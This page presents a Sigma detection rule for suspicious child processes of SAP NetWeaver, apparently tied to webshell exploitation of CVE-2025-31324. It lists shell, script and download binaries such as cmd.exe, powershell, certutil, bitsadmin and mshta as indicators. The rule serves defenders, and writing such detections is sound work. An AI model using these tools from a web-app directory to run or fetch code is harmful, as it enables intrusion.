Suspicious Child Process of SAP NetWeaver
Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.
Sigma rule (View on GitHub)
1title: Suspicious Child Process of SAP NetWeaver
2id: 5b304bcb-ac33-49d0-87af-fa1b3ca94333
3status: experimental
4description: |
5 Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential
6 exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.
7author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
8date: 2025-04-28
9tags:
10 - attack.initial-access
11 - attack.t1190
12 - attack.persistence
13 - attack.t1059.003
14 - cve.2025-31324
15 - detection.emerging-threats
16references:
17 - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
18 - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
19logsource:
20 category: process_creation
21 product: windows
22detection:
23 selection_parent_img:
24 ParentImage|contains:
25 - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
26 - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
27 selection_current_dict:
28 CurrentDirectory|contains:
29 - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
30 - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
31 selection_child:
32 Image|endswith:
33 - '\cmd.exe'
34 - '\powershell.exe'
35 - '\powershell_ise.exe'
36 - '\pwsh.exe'
37 - '\wscript.exe'
38 - '\cscript.exe'
39 - '\regsvr32.exe'
40 - '\rundll32.exe'
41 - '\mshta.exe'
42 - '\certutil.exe'
43 - '\bitsadmin.exe'
44 - '\python.exe'
45 condition: (selection_parent_img or selection_current_dict) and selection_child
46falsepositives:
47 - Legitimate administrative activities such as software updates
48level: medium
References
Related rules
- Potential SAP NetWeaver Webshell Creation
- Potential SAP NetWeaver Webshell Creation - Linux
- Suspicious Child Process of SAP NetWeaver - Linux
- Potential SAP NetViewer Webshell Command Execution
- Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)